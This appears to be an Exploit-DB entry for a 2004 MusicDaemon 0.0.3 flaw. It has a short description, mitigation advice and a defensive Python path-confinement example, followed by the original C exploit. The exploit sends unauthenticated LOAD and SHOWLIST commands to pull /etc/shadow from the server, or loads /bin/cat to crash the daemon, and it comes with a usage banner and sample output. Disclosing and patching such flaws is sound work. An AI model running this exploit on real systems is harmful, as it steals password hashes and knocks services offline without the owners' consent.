Vendor: MusicDaemon
By: Tal0n
CVSS: 7.5 (HIGH)
Vulnerability type: Remote File Disclosure
CWE: 200
Product Name: MusicDaemon
Affected Version From: 0.0.3
Affected Version To: 0.0.3
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Slackware 9, Redhat 9
Year: 2004

MusicDaemon <= 0.0.3 v2 Remote /etc/shadow Stealer / DoS

This exploit allows an attacker to remotely steal the /etc/shadow file from a vulnerable MusicDaemon version 0.0.3. It needs no shellcode or return addresses: the daemon accepts commands without any authentication and, because it runs as root by default, its LOAD command will open any file on the system. By sending the daemon's own LOAD and SHOWLIST commands, an attacker can retrieve sensitive system files such as /etc/shadow; loading a binary instead and issuing SHOWLIST crashes the daemon (DoS).

Mitigation:

To mitigate this vulnerability, it is recommended to update MusicDaemon to a secure version that includes proper authentication and a check that LOAD only opens files the daemon is meant to serve. Additionally, ensure that MusicDaemon is not running as the root user; the default configuration runs it as root, and the configuration file lets you choose a different user.
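The server-side check the mitigation calls for, as an added example that is not MusicDaemon's own code: the daemon's LOAD command hands a client-supplied path straight to the filesystem while running as root, so a defensive implementation canonicalises the argument and refuses anything that does not stay inside the configured music root. It assumes a music root directory and a playable-extension allow-list, both constructed here.

```python
import os
import tempfile

ALLOWED_EXT = {".mp3", ".ogg", ".m3u"}   # assumption: what a player may LOAD


class LoadRejected(Exception):
    """Raised for any LOAD argument that must not reach the filesystem."""


def confine_load(music_root: str, requested: str) -> str:
    """Map a client-supplied LOAD argument onto a file inside music_root.

    The argument is always interpreted relative to the root (a leading '/'
    is stripped), the result is canonicalised with realpath so '..' and
    symlinks are resolved, and the canonical path must still lie under the
    canonical root.  Anything else, and anything that is not a regular file
    with a playable extension, is rejected before it is ever opened.
    """
    root = os.path.realpath(music_root)
    candidate = os.path.realpath(os.path.join(root, requested.lstrip("/")))
    if os.path.commonpath([root, candidate]) != root:
        raise LoadRejected(f"{requested!r} escapes the music root")
    if not os.path.isfile(candidate):
        raise LoadRejected(f"{requested!r} is not a regular file")
    if os.path.splitext(candidate)[1].lower() not in ALLOWED_EXT:
        raise LoadRejected(f"{requested!r} is not a playable file")
    return candidate


def demo() -> dict:
    """Constructed music root: one playlist plus a symlink pointing out at /etc/shadow."""
    root = tempfile.mkdtemp(prefix="musicd-")
    with open(os.path.join(root, "mix.m3u"), "w") as f:
        f.write("track1.mp3\n")
    os.symlink("/etc/shadow", os.path.join(root, "link.m3u"))
    results = {}
    # The last four requests are the shapes the exploit relies on: absolute path,
    # traversal, symlink escape, and a binary that would crash SHOWLIST.
    for req in ("mix.m3u", "/etc/shadow", "../../../../etc/shadow", "link.m3u", "/bin/cat"):
        try:
            confine_load(root, req)
            results[req] = "accepted"
        except LoadRejected:
            results[req] = "rejected"
    return results


if __name__ == "__main__":
    for req, verdict in demo().items():
        print(f"LOAD {req}: {verdict}")
```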

Exploit-DB raw data:

/* MusicDaemon <= 0.0.3 v2 Remote /etc/shadow Stealer / DoS 
* Vulnerability discovered by: Tal0n 05-22-04 
* Exploit code by: Tal0n 05-22-04 
* 
* Greets to: atomix, vile, ttl, foxtrot, uberuser, d4rkgr3y, blinded, wsxz, 
* serinth, phreaked, h3x4gr4m, xaxisx, hex, phawnky, brotroxer, xires, 
* bsdaemon, r4t, mal0, drug5t0r3, skilar, lostbyte, peanuter, and over_g 
* 
* MusicDaemon MUST be running as root, which it does by default anyways. 
* Tested on Slackware 9 and Redhat 9, but should work generically since the 
* nature of this vulnerability doesn't require 
* shellcode or return addresses. 
* 
* 
* Client Side View: 
* 
* root@vortex:~/test# ./md-xplv2 127.0.0.1 1234 shadow 
* 
* MusicDaemon <= 0.0.3 Remote /etc/shadow Stealer 
* 
* Connected to 127.0.0.1:1234... 
* Sending exploit data... 
* 
* <*** /etc/shadow file from 127.0.0.1 ***> 
* 
* Hello 
* <snipped for privacy> 
* ...... 
* bin:*:9797:0::::: 
* ftp:*:9797:0::::: 
* sshd:*:9797:0::::: 
* ...... 
* </snipped for privacy> 
* 
* <*** End /etc/shadow file ***> 
* 
* root@vortex:~/test# 
* 
* Server Side View: 
* 
* root@vortex:~/test/musicdaemon-0.0.3/src# ./musicd -c ../musicd.conf -p  1234 
* Using configuration: ../musicd.conf 
* [Mon May 17 05:26:07 2004] cmd_set() called 
* Binding to port 5555. 
* [Mon May 17 05:26:07 2004] Message for nobody: VALUE: LISTEN-PORT=5555 
* [Mon May 17 05:26:07 2004] cmd_modulescandir() called 
* [Mon May 17 05:26:07 2004] cmd_modulescandir() called Binding to port 1234. 
* [Mon May 17 05:26:11 2004] New connection! 
* [Mon May 17 05:26:11 2004] cmd_load() called 
* [Mon May 17 05:26:13 2004] cmd_show() called 
* [Mon May 17 05:26:20 2004] Client lost. 
* 
* 
 * As you can see, it simply makes a connection, sends the commands, and
 * leaves. MusicDaemon doesn't even log the new connection's IP, that I
 * know of. Works very well, eh? :)
 *
 * The vulnerability is in that there is no authentication for 1. For 2, it
 * will let you "LOAD" any file on the box if you have the correct privileges,
 * and by default, as I said before, it runs as root, unless you change the
 * configuration file to make it run as a different user.
 *
 * After we "LOAD" the /etc/shadow file, we do a "SHOWLIST" so we can grab
 * the contents of the actual file. You can substitute any file you want in
 * for /etc/shadow, I just coded it to grab it because it being such an
 * important system file if you know what I mean ;).
 *
 * As for the DoS, if you "LOAD" any binary on the system, then use "SHOWLIST",
 * it will crash music daemon.
* 
* 
*/ 
  
  
#include <stdio.h>
#include <stdlib.h>
#include <string.h>      /* strlen, strcmp, memset */
#include <unistd.h>      /* sleep, read, close */
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>   /* inet_addr */

int main(int argc, char *argv[]) {

    char buffer[16384];

    /* MusicDaemon commands: LOAD opens the named file as a "playlist",
     * SHOWLIST dumps it back to the client, CLEAR resets the playlist. */
    char *xpldata1 = "LOAD /etc/shadow\r\n";
    char *xpldata2 = "SHOWLIST\r\n";
    char *xpldata3 = "CLEAR\r\n";
    /* Loading a binary and then SHOWLISTing it crashes the daemon. */
    char *dosdata1 = "LOAD /bin/cat\r\n";
    char *dosdata2 = "SHOWLIST\r\n";
    char *dosdata3 = "CLEAR\r\n";

    int len1 = strlen(xpldata1);
    int len2 = strlen(xpldata2);
    int len3 = strlen(xpldata3);
    int len4 = strlen(dosdata1);
    int len5 = strlen(dosdata2);
    int len6 = strlen(dosdata3);

    if(argc != 4) {
        printf("\nMusicDaemon <= 0.0.3 Remote /etc/shadow Stealer / DoS");
        printf("\nDiscovered and Coded by: Tal0n 05-22-04\n");
        printf("\nUsage: %s <host> <port> <option>\n", argv[0]);
        printf("\nOptions:");
        printf("\n\t\tshadow - Steal /etc/shadow file");
        printf("\n\t\tdos - DoS Music Daemon\n\n");
        return 0;
    }

    printf("\nMusicDaemon <= 0.0.3 Remote /etc/shadow Stealer / DoS\n\n");

    int sock;
    struct sockaddr_in remote;

    memset(&remote, 0, sizeof(remote));
    remote.sin_family = AF_INET;
    remote.sin_port = htons(atoi(argv[2]));
    remote.sin_addr.s_addr = inet_addr(argv[1]);

    if((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
        printf("\nError: Can't create socket!\n\n");
        return -1;
    }

    if(connect(sock, (struct sockaddr *)&remote, sizeof(struct sockaddr)) < 0) {
        printf("\nError: Can't connect to %s:%s!\n\n", argv[1], argv[2]);
        return -1;
    }

    printf("Connected to %s:%s...\n", argv[1], argv[2]);

    if(strcmp(argv[3], "dos") == 0) {

        printf("Sending DoS data...\n");

        send(sock, dosdata1, len4, 0);
        sleep(2);
        send(sock, dosdata2, len5, 0);
        sleep(2);
        send(sock, dosdata3, len6, 0);

        printf("\nTarget %s DoS'd!\n\n", argv[1]);

        close(sock);
        return 0;
    }

    if(strcmp(argv[3], "shadow") == 0) {

        printf("Sending exploit data...\n");

        send(sock, xpldata1, len1, 0);
        sleep(2);
        send(sock, xpldata2, len2, 0);
        sleep(5);

        printf("Done! Grabbing /etc/shadow...\n");

        /* Zero the buffer first and read one byte less than its size so the
         * response is always NUL-terminated before it is printed. */
        memset(buffer, 0, sizeof(buffer));
        read(sock, buffer, sizeof(buffer) - 1);

        sleep(2);

        printf("\n<*** /etc/shadow file from %s ***>\n\n", argv[1]);
        printf("%s", buffer);
        printf("\n<*** End /etc/shadow file ***>\n\n");

        send(sock, xpldata3, len3, 0);
        sleep(1);

        close(sock);
        return 0;
    }

    close(sock);
    return 0;
}

// milw0rm.com [2004-08-24]